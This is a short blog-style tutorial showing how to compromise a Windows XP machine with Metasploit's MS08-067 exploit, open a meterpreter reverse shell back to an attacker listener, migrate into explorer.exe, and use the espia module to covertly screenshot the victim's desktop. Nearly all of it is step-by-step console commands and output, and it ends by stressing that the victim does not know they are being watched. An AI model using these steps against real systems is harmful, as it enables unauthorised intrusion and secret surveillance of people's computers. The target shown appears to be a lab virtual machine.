Taking Screenshots Of The Victim’s Computer With Metasploit
January 30, 2010 – 3:51 PMHere’s a quick example of grabbing a screenshot of a compromised system using meterpreter’s espia module. Start with a basic exploit to gain a meterpreter session. You’ll need to make sure you migrate to a process that has access to Active Desktop or else you will get nothing but blank images:
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 10.6.18.104
rhost => 10.6.18.104
msf exploit(ms08_067_netapi) > set lhost 10.6.18.100
lhost => 10.6.18.100
msf exploit(ms08_067_netapi) > exploit
[*] Handler trying to bind to 10.6.18.100
[*] Started reverse handler on port 4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.6.18.100:4444 -> 10.6.18.104:1100)
meterpreter > ps
Process list
============
PID Name Arch User Path
— —- —- —- —-
0 [System Process]
4 System x86 NT AUTHORITY\SYSTEM
384 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
524 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
556 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
692 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
704 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
876 VBoxService.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
904 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
972 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1064 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1124 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1192 svchost.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1452 spoolsv.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
284 explorer.exe x86 VM-WINXP\Troy C:\WINDOWS\Explorer.EXE
624 VBoxTray.exe x86 VM-WINXP\Troy C:\WINDOWS\system32\VBoxTray.exe
632 ctfmon.exe x86 VM-WINXP\Troy C:\WINDOWS\system32\ctfmon.exe
656 alg.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
1252 wscntfy.exe x86 VM-WINXP\Troy C:\WINDOWS\system32\wscntfy.exe
1940 firefox.exe x86 VM-WINXP\Troy C:\Program Files\Mozilla Firefox\firefox.exe
meterpreter > migrate 284
[*] Migrating to 284…
[*] Migration completed successfully.
meterpreter >
Now we load the espia module and view the victim’s live desktop:
meterpreter > use espia
Loading extension espia…success.
meterpreter > screenshot -h
Usage: screenshot <path.bmp> [view in browser: true|false]
meterpreter > screenshot /tmp/victim.bmp
[*] Image saved to /tmp/victim.bmp
meterpreter >
The image should open automatically and display on your screen:
That’s it. You are now viewing the victim’s desktop without them even knowing you are there.
